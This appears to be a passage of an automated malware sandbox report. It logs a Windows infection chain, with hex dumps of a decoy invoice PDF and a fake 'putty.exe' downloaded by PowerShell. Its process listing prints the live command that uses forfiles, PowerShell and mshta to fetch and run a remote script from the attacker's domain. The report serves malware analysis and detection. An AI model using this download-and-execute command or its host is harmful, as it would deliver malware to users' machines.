                    2024-07-02 10:47:22 UTC16384INData Raw: 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 80 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 0d 00 00 00 1d 00 00 00 32 00 00 00 43 00 00 00 50 00 00 00 59 00 00 00 5d 00 00 00 59 00 00 00 50 00 00 00 43 00 00 00 32 00 00 00 1d 00 00 00 0d 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 06 00 00 00 18 15 0a 00 3f 3a 1b 00 89 49 22 00 bc 54 27 00 dd 5b 2a 00 f3 60 2c 00 fe 5b 2a 00 f3 53 26 00 e0 46 20 00 c4 32 17 00 9f 0c 06 00 6d 00 00 00 50 00 00 00
                    Data Ascii: @ 2CPY]YPC2?:I"T'[*`,[*S&F 2mP


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.8497085.188.88.1464434620C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    TimestampBytes transferredDirectionData
                    2024-07-02 10:47:25 UTC96OUTGET /cdnusa/upsinvoice.pdf HTTP/1.1
                    Host: nebulaquestcorporation.cc
                    Connection: Keep-Alive
                    2024-07-02 10:47:25 UTC310INHTTP/1.1 200 OK
                    Server: nginx
                    Date: Tue, 02 Jul 2024 10:47:25 GMT
                    Content-Type: application/pdf
                    Content-Length: 93556
                    Last-Modified: Wed, 12 Jun 2024 12:17:52 GMT
                    Connection: close
                    ETag: "666991f0-16d74"
                    Expires: Thu, 31 Dec 2037 23:55:55 GMT
                    Cache-Control: max-age=315360000
                    Accept-Ranges: bytes
                    2024-07-02 10:47:25 UTC16074INData Raw: 25 50 44 46 2d 31 2e 35 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 2d 55 53 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 31 33 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 73 2f 43 6f 75 6e 74 20 31 2f 4b 69 64 73 5b 20 33 20 30 20 52 5d 20 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 2f 50 61 72 65 6e 74 20 32 20 30 20 52 2f 52 65 73 6f 75 72 63 65 73 3c 3c 2f 46 6f 6e 74 3c 3c 2f 46 31 20 35 20 30 20 52 2f 46 32 20 38 20 30 20 52 2f 46 33
                    Data Ascii: %PDF-1.5%1 0 obj<</Type/Catalog/Pages 2 0 R/Lang(en-US) /StructTreeRoot 13 0 R/MarkInfo<</Marked true>>>>endobj2 0 obj<</Type/Pages/Count 1/Kids[ 3 0 R] >>endobj3 0 obj<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 8 0 R/F3
                    2024-07-02 10:47:25 UTC16384INData Raw: 8e 33 80 e3 0c e0 38 03 38 ce 00 8e 33 80 e3 0c e0 38 03 38 ce 00 8e 33 80 e3 0c e0 38 03 38 ce 00 8e 33 80 e3 0c e0 38 03 38 ce 00 8e 33 80 e3 0c e0 38 03 38 f6 3f c7 fe e7 d8 ff 1c 7b 9f 63 ef 73 ec 7d 8e bd cf b1 f7 39 f6 3e c7 de e7 d8 fb 1c 7b 9f 63 ef ff d0 e7 f0 7f 78 aa fe a1 1b f0 1f 9e 32 d7 ac 66 cc 74 2d 63 47 2e 39 e6 5b d9 8b d9 29 ac 9d 75 e1 39 87 9d cf 2e 61 8f b2 37 58 2d db 0a b5 93 ed 62 37 b3 5b 59 94 3d c6 7e c6 5e fd 67 7e 15 fc c8 06 43 33 b3 eb ee 63 46 36 80 b1 de 43 bd 07 8f dc 0c f4 18 92 fa 59 2e 41 6e 80 5e 3d 6a e9 75 f6 7e 78 9c ed c3 23 97 f4 3a 8f f4 18 53 99 55 ab eb 50 5e 86 f5 13 7e b8 f7 10 7e be 22 df 3b 49 e4 95 73 a1 93 b5 1a 1f 9b ae 3d 72 d7 91 5b 8e 1b 83 25 6c 05 5b c9 56 b1 93 59 0d f3 a3 ff 75 ac 91 85 30 32
                    Data Ascii: 388388388388388?{cs}9>{cx2ft-cG.9[)u9.a7X-b7[Y=~^g~C3cF6CY.An^=ju~x#:SUP^~~";Is=r[%l[VYu02
                    2024-07-02 10:47:26 UTC16384INData Raw: 17 bd be 4b b6 6b a5 d1 77 d1 15 31 4d be 4b 76 eb 92 dd ba 64 b7 2e ba 7b 17 dd bd 4b 66 eb 92 d9 ba e8 8e 58 66 6b a5 3d 62 99 a6 4b a6 e9 92 5d ba a2 2a b9 7c b7 91 3c 20 77 c7 72 76 51 d7 6d d0 6b 6c 05 1f b1 82 8f 94 a2 4a 95 6c df 99 e8 2b 92 7c 28 b4 99 41 8b a7 da 12 1f 8b 7a 8b 30 6a 9e e8 64 fd e4 a3 a4 76 d6 69 a7 f8 9d eb ae e2 0c cc 38 5b fa 06 a1 b5 f8 3c 4b f4 b5 9f 3e 16 76 b9 5e fc 56 d6 13 de 5b 13 1d ec ac 38 fb 4e b3 ef 34 fb ce d2 cc 2f a2 15 2e 0d cb de 37 f3 4e 33 ef 2c cd ba ce b1 1e 4b d1 88 26 98 9d 99 75 9a 59 a7 99 75 46 47 ea 6d 31 fb ee 60 df 15 ec bb e2 fd 95 b9 be db f4 b2 9e 6d 77 e8 61 bd 1e d6 ff 5b 35 fe 74 e9 1b bf f5 6c bb 83 6d 57 b0 ed 8e bf ab d0 57 38 cf 97 be 05 2c 55 ea 6c bb 42 ef eb d9 76 c5 fb ab f5 a8 cc cc
                    Data Ascii: Kkw1MKvd.{KfXfk=bK]*|< wrvQmklJl+|(Az0jdvi8[<K>v^V[8N4/.7N3,K&uYuFGm1`mwa[5tlmWW8,UlBv
                    2024-07-02 10:47:26 UTC16384INData Raw: f0 36 5d 69 99 16 52 c0 b4 28 6a 99 16 42 30 2d 84 60 5a 08 c1 b4 10 ae 0f b6 d3 85 c1 8e 60 07 6a d9 19 ec 44 39 60 5d 54 cd b2 2e c4 4d 60 ec ff de 8a 10 5d 1a 61 11 46 19 96 81 51 31 30 30 85 30 88 04 54 2b 82 8d aa 45 a2 91 28 e2 3a 92 88 30 29 82 f1 37 92 1c 49 a6 da 91 42 91 14 a4 a4 46 52 a9 7e 24 2d 92 46 e7 46 0a 47 0a 53 83 48 91 48 51 a4 67 44 32 a8 66 24 33 92 49 67 45 8a 45 8a 21 5e 3c 52 1c b5 94 88 94 c0 d5 92 91 92 48 01 b7 43 1c dc 0e 2d 01 b7 43 08 6e 87 10 dc 0e 21 b8 1d 42 70 3b 84 e0 76 08 c1 ed 10 82 db 21 04 b7 43 08 6e 87 10 dc 8e a2 96 db d1 85 e0 76 d7 53 72 f4 86 e8 0d 24 a3 37 46 6f 44 fc a6 e8 4d 88 df 1c bd 19 f1 5b a2 4d 29 cd 32 3f a4 f4 8c 8e 21 1e 7d 23 fa 0e e2 e0 7f 88 83 ff 41 06 fc 0f 32 fb 13 18 f1 04 9e 90 49 17 5b
                    Data Ascii: 6]iR(jB0-`Z`jD9`]T.M`]aFQ1000T+E(:0)7IBFR~$-FFGSHHQgD2f$3IgEE!^<RHC-Cn!Bp;v!CnvSr$7FoDM[M)2?!}#A2I[
                    2024-07-02 10:47:26 UTC16384INData Raw: bf 05 fd 6c f0 e7 81 7b 81 ef 40 ff a2 5a 42 9a 0e f3 bf 11 7f 9d e3 d6 68 31 bf 47 7c 0b cb 0d c5 e6 5a c2 b3 2a 45 82 31 8d 75 94 8b e6 f9 84 ff c5 68 38 2f 25 84 a6 5c d8 49 03 a6 e3 59 1d b8 0c d8 5d bd 85 bb cf 11 ff 01 a3 f1 34 f8 1a e0 61 e0 cb 6a 11 cf 91 e5 22 70 3b b0 0a 58 01 6c 62 ec d0 83 de 35 44 cc 20 34 5f b2 f0 6f a8 14 83 1f 09 ec 2c b1 0a 58 01 e4 67 bb 43 73 1f ee 6e 81 e4 24 24 65 90 ac 13 f3 ce 3c e1 76 60 15 b0 02 d8 04 64 fd b1 d0 9c 8b a7 14 81 e6 57 38 2a c0 bf 8c 9e 6f 04 5f 0d dc 28 25 55 c0 0a 60 13 30 9f c6 b2 c7 5c 81 28 f2 33 e2 ed 27 80 57 f0 ec 32 89 db 81 55 c0 0a 20 5b 58 06 6f fc 9c 75 4c ab 80 3f 47 9f af 00 eb 61 a7 9e fb 6c b8 68 3e 44 78 15 78 d1 fc 1a 30 02 9c 06 44 24 98 1b c9 42 77 cc d7 75 68 d6 03 2f 48 9c 8f
                    Data Ascii: l{@ZBh1G|Z*E1uh8/%\IY]4aj"p;Xlb5D 4_o,XgCsn$$e<v`dW8*o_(%U`0\(3'W2U [XouL?Galh>Dxx0D$Bwuh/H
                    2024-07-02 10:47:26 UTC11946INData Raw: 8e e6 24 9c 02 c7 b0 b5 ec 07 f6 23 fb 89 fd cc d6 b1 f5 52 0c 7b d2 59 d2 d9 d2 39 d2 5c e9 5c e9 3c e9 7c e9 02 e9 42 e9 4e 69 b1 b4 44 ba 4b ba 5b ba 47 ba 57 5a 2a dd 27 bd 22 bd 26 bd 21 bd 29 bd 2d bd 2b fd 5d fa 40 fa 48 fa 44 fa 4c fa 42 fa 4a a6 20 63 64 8a 32 56 26 95 c9 64 4a 32 4e a6 2c b3 92 59 cb 6c 64 b6 32 3b 19 2f 93 cb ec 65 0e 32 47 99 93 cc 59 e6 22 73 95 b9 c9 dc 65 1e b2 96 b2 56 32 4f 59 6b 59 1b 99 97 cc 5b e6 23 f3 95 f9 71 32 4e 89 e3 38 35 4e 9d d3 e0 de 73 b5 dc 07 4e 8f d3 e7 84 79 50 33 12 79 22 12 6d d2 98 75 75 c0 3e 2d 81 4a c4 cc 21 0d 47 95 32 6a 14 8e 2a 95 c8 ba 59 8e c4 90 ca 24 32 54 21 e3 bf aa a2 2d a2 2d 48 4d b2 49 b2 19 a9 4b 8a 25 c5 48 53 f2 4e f2 0e 73 46 1c 2f 21 2d 21 5e c2 dc ea 06 7b 0f 59 08 51 13 66 52
                    Data Ascii: $#R{Y9\\<|BNiDK[GWZ*'"&!)-+]@HDLBJ cd2V&dJ2N,Yld2;/e2GY"seV2OYkY[#q2N85NsNyP3y"muu>-J!G2j*Y$2T!--HMIK%HSNsF/!-!^{YQfR


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.8497105.188.88.1464434620C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    TimestampBytes transferredDirectionData
                    2024-07-02 10:47:27 UTC67OUTGET /cdnusa/putty.exe HTTP/1.1
                    Host: nebulaquestcorporation.cc
                    2024-07-02 10:47:27 UTC322INHTTP/1.1 200 OK
                    Server: nginx
                    Date: Tue, 02 Jul 2024 10:47:27 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 1663264
                    Last-Modified: Mon, 20 May 2024 14:16:58 GMT
                    Connection: close
                    ETag: "664b5b5a-196120"
                    Expires: Thu, 31 Dec 2037 23:55:55 GMT
                    Cache-Control: max-age=315360000
                    Accept-Ranges: bytes
                    2024-07-02 10:47:27 UTC16062INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 bf 1a 11 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 00 00 82 0e 00 00 84 0a 00 00 00 00 00 04 af 0b 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 19 00 00 04 00 00 71 20 1a 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00
                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEdf"@q `
                    2024-07-02 10:47:27 UTC16384INData Raw: f1 e8 8c 47 01 00 01 c5 48 8d 84 24 a0 00 00 00 29 c5 e9 3a f6 ff ff 0f 1f 00 4f ec ff ff 72 c8 ff ff ef ce ff ff ae d3 ff ff 3f ce ff ff ae d3 ff ff 10 cf ff ff c4 cf ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ff d0 ff ff 58 d0 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff 1d d0 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae d3 ff ff ae
                    Data Ascii: GH$):Or?X
                    2024-07-02 10:47:27 UTC16384INData Raw: 1f 00 48 83 c6 01 48 81 fe 06 01 00 00 74 33 83 bc b4 30 01 00 00 00 74 e9 48 8b 05 1a 40 12 00 0f b6 4c b0 06 44 0f b6 4c b0 05 44 0f b6 44 b0 04 89 4c 24 20 4c 89 e1 48 89 fa e8 b2 a4 03 00 eb c0 48 85 ed 74 4f 48 89 e9 31 d2 e8 61 c7 03 00 48 85 c0 74 40 bf 01 00 00 00 48 8d 1d 92 94 10 00 8b 40 04 0f b6 f4 44 0f b6 c0 c1 e8 10 0f b6 c0 89 44 24 20 4c 89 e1 48 89 da 41 89 f1 e8 6e a4 03 00 48 89 e9 89 fa e8 24 c7 03 00 83 c7 01 48 85 c0 75 cc 48 89 6c 24 58 48 8d 05 ad b4 0f 00 48 89 84 24 08 01 00 00 48 c7 84 24 10 01 00 00 01 00 00 00 48 8d 94 24 08 01 00 00 4c 89 e1 e8 7c 9f 03 00 48 8b 7c 24 78 83 7c 24 54 00 0f 8e d8 05 00 00 83 bc 24 88 00 00 00 00 0f 8e ca 05 00 00 31 ed 0f 57 f6 45 31 ed c7 44 24 6c ff ff ff ff c7 44 24 68 ff ff ff ff c7 84 24
                    Data Ascii: HHt30tH@LDLDDL$ LHHtOH1aHt@H@DD$ LHAnH$HuHl$XHH$H$H$L|H|$x|$T$1WE1D$lD$h$
                    2024-07-02 10:47:27 UTC16384INData Raw: c1 48 83 c4 28 5f 5e e9 66 48 00 00 cc cc cc cc cc cc 41 57 41 56 41 55 41 54 56 57 55 53 b8 48 10 00 00 e8 aa de 0a 00 48 29 c4 48 89 d7 48 89 ce 48 8b 05 5a e5 11 00 48 31 e0 48 89 84 24 40 10 00 00 8b 1d 11 d7 0d 00 89 d9 e8 a2 a3 02 00 89 d9 e8 0b a4 02 00 48 89 c3 31 c9 e8 a1 a3 02 00 48 85 db 74 0b 8b 8b a4 00 00 00 e8 91 a3 02 00 48 89 f1 ba 83 00 00 00 45 31 c0 e8 41 50 03 00 31 c9 48 89 f2 e8 27 c5 02 00 48 89 f9 e8 2f a1 ff ff 48 89 c3 48 89 c1 48 89 f2 e8 91 a1 ff ff 84 c0 74 1f 48 89 f1 e8 65 5a 03 00 84 c0 75 22 48 89 f1 e8 d9 5e 01 00 84 c0 75 16 31 c9 e8 4e a0 ff ff 48 89 d9 48 89 f2 e8 13 a2 ff ff 84 c0 74 1b 48 89 f1 e8 c7 a1 02 00 48 83 3d af 07 12 00 00 0f 85 9d 02 00 00 e9 c6 02 00 00 80 3b 00 74 3b 31 db 48 8d 54 24 3c 4c 8d 44 24 30
                    Data Ascii: H(_^fHAWAVAUATVWUSHH)HHHZH1H$@H1HtHE1AP1H'H/HHHtHeZu"H^u1NHHtHH=;t;1HT$<LD$0
                    2024-07-02 10:47:27 UTC16384INData Raw: 08 12 00 00 00 0f 11 b6 74 21 00 00 c6 86 84 21 00 00 00 e8 3a eb 00 00 48 89 86 10 12 00 00 48 89 f1 31 d2 e8 19 00 00 00 48 89 f0 0f 28 74 24 20 48 83 c4 38 5b 5f 5e 41 5e c3 cc cc cc cc cc cc cc 41 56 56 57 55 53 48 81 ec 40 01 00 00 66 44 0f 7f bc 24 30 01 00 00 44 0f 29 b4 24 20 01 00 00 66 44 0f 7f ac 24 10 01 00 00 66 44 0f 7f a4 24 00 01 00 00 44 0f 29 9c 24 f0 00 00 00 66 44 0f 7f 94 24 e0 00 00 00 66 44 0f 7f 8c 24 d0 00 00 00 44 0f 29 84 24 c0 00 00 00 0f 29 bc 24 b0 00 00 00 0f 29 b4 24 a0 00 00 00 41 89 d6 48 89 ce 48 81 c1 2a 15 00 00 41 b8 06 01 00 00 b2 01 e8 8c b7 0a 00 48 8d 1d 45 97 0d 00 31 ff 0f 1f 00 48 63 2b 48 8b 8e e8 10 00 00 ba 96 00 00 00 41 89 f8 e8 79 08 03 00 48 8d 6c 6d 00 88 84 2e 18 12 00 00 48 8b 8e e8 10 00 00 44 8d 47
                    Data Ascii: t!!:HH1H(t$ H8[_^A^AVVWUSH@fD$0D)$ fD$fD$D)$fD$fD$D)$)$)$AHH*AHE1Hc+HAyHlm.HDG
                    2024-07-02 10:47:27 UTC16384INData Raw: 54 24 47 48 8d a9 a0 00 00 00 4c 8d a1 20 01 00 00 48 8d 81 78 0e 00 00 48 89 44 24 30 48 8d 81 0c 01 00 00 48 89 84 24 a0 00 00 00 48 8d 81 88 0e 00 00 48 89 44 24 68 48 8d 41 40 48 89 84 24 98 00 00 00 48 8d 81 8c 00 00 00 48 89 44 24 58 48 8d 41 60 48 89 44 24 38 48 8d 41 78 48 89 44 24 60 4c 8d b1 6a 0a 00 00 0f 57 f6 31 f6 31 ff 31 c0 48 89 84 24 80 00 00 00 eb 11 66 0f 1f 44 00 00 41 c7 87 1c 01 00 00 00 00 00 00 41 bd ff ff ff ff 48 39 f7 72 17 41 83 fd ff 75 11 48 89 e9 e8 ac ff 01 00 48 85 c0 0f 84 f5 36 00 00 41 83 fd ff 74 0d 44 89 ac 24 ac 00 00 00 e9 b0 00 00 00 41 83 bf a8 21 00 00 00 0f 85 d4 36 00 00 48 39 f7 75 5b 48 89 e9 48 89 f2 e8 12 5a 03 00 48 89 e9 e8 6a ff 01 00 48 85 c0 0f 84 b1 36 00 00 48 8d 8c 24 b0 00 00 00 48 89 ea e8 c1 5a
                    Data Ascii: T$GHL HxHD$0HH$HHD$hHA@H$HHD$XHA`HD$8HAxHD$`LjW111H$fDAAH9rAuHH6AtD$A!6H9u[HHZHjH6H$HZ
                    2024-07-02 10:47:27 UTC16384INData Raw: ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 58 ed ff ff 28 e3 ff ff 9a e3 ff ff 58 ed ff ff 58 ed ff ff 1e e4 ff ff c8
                    Data Ascii: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX(XX
                    2024-07-02 10:47:27 UTC16384INData Raw: 8d 00 00 00 80 7e 20 00 0f 84 13 01 00 00 41 83 fc 01 0f 85 2c 01 00 00 41 f7 c7 00 00 40 00 75 19 48 8d 0d aa 11 10 00 48 8d 15 e5 e8 0f 00 41 b8 87 17 00 00 e8 b4 ed 0a 00 c7 44 24 4c 20 00 20 00 0f b7 06 8b 53 7c 48 8b 8b c8 10 00 00 48 8b ab 80 00 00 00 48 8b 31 48 89 6c 24 38 89 44 24 30 89 54 24 28 c7 44 24 20 02 00 00 00 4c 8d 4c 24 4c 44 89 ea 45 89 f0 ff 56 08 48 8b 8b c8 10 00 00 48 8b 01 44 89 ea 45 89 f0 ff 50 18 eb 71 48 8b 94 24 d8 00 00 00 0f b7 06 48 8b 8b c8 10 00 00 48 8b 39 48 89 54 24 38 89 44 24 30 44 89 7c 24 28 44 89 64 24 20 44 89 ea 45 89 f0 49 89 e9 ff 57 08 41 f7 c7 00 00 00 60 74 34 0f b7 06 48 8b 8b c8 10 00 00 48 8b 19 48 8b 94 24 d8 00 00 00 48 89 54 24 38 89 44 24 30 44 89 7c 24 28 44 89 64 24 20 44 89 ea 45 89 f0 49 89 e9
                    Data Ascii: ~ A,A@uHHAD$L S|HHH1Hl$8D$0T$(D$ LL$LDEVHHDEPqH$HH9HT$8D$0D|$(Dd$ DEIWA`t4HHH$HT$8D$0D|$(Dd$ DEI
                    2024-07-02 10:47:27 UTC16384INData Raw: 19 90 41 0f b6 8f 78 04 00 00 49 8b 6f 18 88 4c 05 ff 40 b5 01 48 85 db 74 4a 48 89 d8 48 83 c3 ff 49 8b 4f 10 8b 4c 81 fc bf 01 00 00 00 d3 e7 0f a3 ca 72 cd 40 f6 c5 01 74 da f7 c7 08 0d 20 00 74 12 41 0f b6 8f 78 04 00 00 49 8b 7f 18 88 4c 07 ff eb c0 81 e7 c6 02 04 00 40 0f b6 ed 0f 44 ef eb b1 4d 8b 03 4d 85 c0 0f 84 2a 04 00 00 49 8b 47 10 8b 00 b9 c6 02 04 00 0f a3 c1 73 11 49 8b 47 18 41 8a 8f 78 04 00 00 88 08 4d 8b 47 50 49 83 f8 02 72 42 b8 01 00 00 00 b9 c6 02 04 00 eb 18 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 83 c0 01 4c 39 c0 73 1e 49 8b 57 10 8b 14 82 0f a3 d1 73 eb 49 8b 57 18 0f b6 5c 02 ff 88 1c 02 4d 8b 47 50 eb d9 4d 85 c0 0f 84 b8 03 00 00 31 c9 48 8d 15 87 e3 0c 00 eb 14 0f 1f 44 00 00 41 89 28 4d 8b 03 48 83 c1 01 4c 39 c1
                    Data Ascii: AxIoL@HtJHHIOLr@t tAxIL@DMM*IGsIGAxMGPIrBf.DHL9sIWsIW\MGPM1HDA(MHL9
                    2024-07-02 10:47:27 UTC16384INData Raw: 8b 84 24 a0 00 00 00 48 8b 0d 84 65 10 00 48 31 e1 48 89 4c 24 58 41 83 f8 52 7f 29 41 83 f8 05 74 63 41 83 f8 10 0f 85 e0 00 00 00 48 89 f1 e8 6e 8a fe ff 31 ff 48 89 f1 31 d2 e8 02 03 03 00 e9 af 00 00 00 41 83 f8 53 0f 84 8c 00 00 00 41 81 f8 02 02 00 00 0f 85 b0 00 00 00 ff 15 28 0d 10 00 80 bf 10 01 00 00 00 0f 84 83 00 00 00 31 d2 83 bf 14 01 00 00 00 0f 95 c2 48 89 f1 e8 bf 02 03 00 eb 6d 49 83 f9 02 75 67 80 3d 60 88 10 00 00 75 5e c6 05 57 88 10 00 01 c7 44 24 28 2c 00 00 00 48 8d 54 24 28 48 89 f1 ff 15 d9 0b 10 00 85 c0 74 1d 83 7c 24 30 03 75 16 c7 44 24 30 01 00 00 00 48 8d 54 24 28 48 89 f1 ff 15 48 0d 10 00 c6 05 19 88 10 00 00 eb 17 44 8b 40 08 48 83 c7 08 48 89 f9 48 89 f2 e8 04 49 00 00 84 c0 74 64 31 ff 48 8b 4c 24 58 48 31 e1 e8 31 5e
                    Data Ascii: $HeH1HL$XAR)AtcAHn1H1ASA(1HmIug=`u^WD$(,HT$(Ht|$0uD$0HT$(HHD@HHHItd1HL$XH11^


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.849723104.77.220.1724437540C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                    TimestampBytes transferredDirectionData
                    2024-07-02 10:47:40 UTC475OUTGET /onboarding/smskillreader.txt HTTP/1.1
                    Host: armmf.adobe.com
                    Connection: keep-alive
                    Accept-Language: en-US,en;q=0.9
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: empty
                    Accept-Encoding: gzip, deflate, br
                    If-None-Match: "78-5faa31cce96da"
                    If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
                    2024-07-02 10:47:40 UTC198INHTTP/1.1 304 Not Modified
                    Content-Type: text/plain; charset=UTF-8
                    Last-Modified: Mon, 01 May 2023 15:02:33 GMT
                    ETag: "78-5faa31cce96da"
                    Date: Tue, 02 Jul 2024 10:47:40 GMT
                    Connection: close


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:1
                    Start time:06:47:16
                    Start date:02/07/2024
                    Path:C:\Windows\System32\forfiles.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\forfiles.exe" /p C:\Windows /m write.exe /c "powershell . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage"
                    Imagebase:0x7ff7b19d0000
                    File size:52'224 bytes
                    MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    General

                    Target ID:2
                    Start time:06:47:16
                    Start date:02/07/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff6ee680000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:3
                    Start time:06:47:16
                    Start date:02/07/2024
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
                    Commandline:. mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage
                    Imagebase:0x7ff6cb6b0000
                    File size:452'608 bytes
                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:4
                    Start time:06:47:18
                    Start date:02/07/2024
                    Path:C:\Windows\System32\mshta.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\system32\mshta.exe" https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage
                    Imagebase:0x7ff7fd880000
                    File size:14'848 bytes
                    MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate
                    Has exited:true

                    General

                    Target ID:6
                    Start time:06:47:21
                    Start date:02/07/2024
                    Path:C:\Windows\System32\svchost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Imagebase:0x7ff67e6d0000
                    File size:55'320 bytes
                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    General

                    Target ID:7
                    Start time:06:47:22
                    Start date:02/07/2024
                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):false
